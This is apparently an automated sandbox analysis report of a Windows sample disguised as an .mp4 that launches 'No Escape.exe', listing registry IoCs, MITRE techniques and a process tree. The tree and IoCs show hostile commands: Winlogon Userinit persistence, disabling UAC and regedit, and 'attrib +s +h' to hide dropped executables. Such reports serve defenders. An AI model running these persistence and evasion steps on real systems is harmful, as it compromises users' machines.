ce537d6a75dc8eaf70494907770fdb780456fea1dc37947bd458481608c5939f

max time kernel
76s
max time network
79s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2024 11:17

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

v0f044gc0000clmruo7og65lhh8ne4g0.mp4
Size

4.5MB
MD5

45b2647eadad13f8cf3137858fb0c3b5
SHA1

2d9b8f5ebc8dfb991eecadf9f85d62bfa6cb65ca
SHA256

ce537d6a75dc8eaf70494907770fdb780456fea1dc37947bd458481608c5939f
SHA512

d40f1d85507f0cd155061c9a95627523293b09005c914fdf9a5aa117646c8e1952b6cc420721daeffa2077e3098ead309b8ffa76d45c35310798d5b167fedb8c
SSDEEP

98304:4ju52Pv5pTpB4WuQLTyxZO3UUpTzFXRzeXwyqjq73zBOQcMN1H4nu9KC/GTG/:ULPh5QWuQCy3dpTzFhK7qjqvN1kuWTS

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4328 attrib.exe
4776 attrib.exe

pid	process
4328	attrib.exe
4776	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

No Escape.exewscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	No Escape.exe
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

Processes:

No Escape.exe

pid process

1092 No Escape.exe

pid	process
1092	No Escape.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

unregmp2.exe

description	ioc	process
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

109 raw.githubusercontent.com
110 raw.githubusercontent.com
113 raw.githubusercontent.com

flow	ioc
109	raw.githubusercontent.com
110	raw.githubusercontent.com
113	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg"	reg.exe

Drops file in Program Files directory 12 IoCs

Processes:

No Escape.exe

description	ioc	process
File created	C:\Program Files (x86)\msg.exe	No Escape.exe
File created	C:\Program Files (x86)\mypc.exe	No Escape.exe
File created	C:\Program Files (x86)\date.txt	No Escape.exe
File opened for modification	C:\Program Files (x86)\	No Escape.exe
File created	C:\Program Files (x86)\hello.jpg	No Escape.exe
File created	C:\Program Files (x86)\launch.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.reg	No Escape.exe
File created	C:\Program Files (x86)\mover.exe	No Escape.exe
File created	C:\Program Files (x86)\shaking.exe	No Escape.exe
File created	C:\Program Files (x86)\	No Escape.exe
File created	C:\Program Files (x86)\erode.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.bat	No Escape.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

chrome.exeLogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133595543091804413"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "246"	LogonUI.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3228 reg.exe
Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid process

2368 regedit.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

chrome.exe

pid process

4152 chrome.exe
4152 chrome.exe
4152 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

4152 chrome.exe
4152 chrome.exe
4152 chrome.exe
4152 chrome.exe
4152 chrome.exe

pid	process
3228	reg.exe

pid	process
2368	regedit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

unregmp2.exechrome.exe

description	pid	process
Token: SeShutdownPrivilege	920	unregmp2.exe
Token: SeCreatePagefilePrivilege	920	unregmp2.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe
Token: SeShutdownPrivilege	4152	chrome.exe
Token: SeCreatePagefilePrivilege	4152	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

chrome.exe

pid	process
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe
4152	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

3288 LogonUI.exe

pid	process
3288	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wmplayer.exeunregmp2.exechrome.exe

description	pid	process	target process
PID 1204 wrote to memory of 4384	1204	wmplayer.exe	setup_wm.exe
PID 1204 wrote to memory of 4384	1204	wmplayer.exe	setup_wm.exe
PID 1204 wrote to memory of 4384	1204	wmplayer.exe	setup_wm.exe
PID 1204 wrote to memory of 3344	1204	wmplayer.exe	unregmp2.exe
PID 1204 wrote to memory of 3344	1204	wmplayer.exe	unregmp2.exe
PID 1204 wrote to memory of 3344	1204	wmplayer.exe	unregmp2.exe
PID 3344 wrote to memory of 920	3344	unregmp2.exe	unregmp2.exe
PID 3344 wrote to memory of 920	3344	unregmp2.exe	unregmp2.exe
PID 4152 wrote to memory of 1104	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 1104	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 216	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 4036	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 4036	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe
PID 4152 wrote to memory of 3824	4152	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4328 attrib.exe
4776 attrib.exe

pid	process
4328	attrib.exe
4776	attrib.exe

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\v0f044gc0000clmruo7og65lhh8ne4g0.mp4"
1⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\v0f044gc0000clmruo7og65lhh8ne4g0.mp4"
2⤵
PID:4384

C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
2⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbfdf8cc40,0x7ffbfdf8cc4c,0x7ffbfdf8cc58
2⤵
PID:1104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1672 /prefetch:2
2⤵
PID:216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1664 /prefetch:3
2⤵
PID:4036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2492 /prefetch:8
2⤵
PID:3824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3144 /prefetch:1
2⤵
PID:4164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3316 /prefetch:1
2⤵
PID:5076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3812,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3640 /prefetch:1
2⤵
PID:5012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3680 /prefetch:8
2⤵
PID:2368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4676 /prefetch:8
2⤵
PID:4248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4936,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4972 /prefetch:8
2⤵
PID:4320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4360,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5020 /prefetch:8
2⤵
PID:2784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4696,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4496 /prefetch:1
2⤵
PID:1724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5252,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5288 /prefetch:1
2⤵
PID:1672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3696,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3444 /prefetch:8
2⤵
PID:3616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5496,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5484 /prefetch:8
2⤵
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5156,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5648 /prefetch:8
2⤵
PID:1092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5192,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5780 /prefetch:8
2⤵
PID:920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5512,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5820 /prefetch:8
2⤵
PID:1176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5440,i,13357899170661140601,2098710249953758106,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5528 /prefetch:8
2⤵
PID:760

C:\Users\Admin\Downloads\No Escape.exe
"C:\Users\Admin\Downloads\No Escape.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:1092

C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\48AC.tmp\48AD.tmp\48AE.vbs //Nologo
3⤵
- Checks computer location settings
PID:4464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
4⤵
PID:2512

C:\Windows\system32\attrib.exe
attrib +s +h C:\msg.exe
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4328

C:\Windows\system32\attrib.exe
attrib +s +h C:\launch.exe
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4776

C:\Windows\regedit.exe
regedit /s hello.reg
5⤵
- Runs .reg file with regedit
PID:2368

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
5⤵
PID:2284

C:\Windows\system32\reg.exe
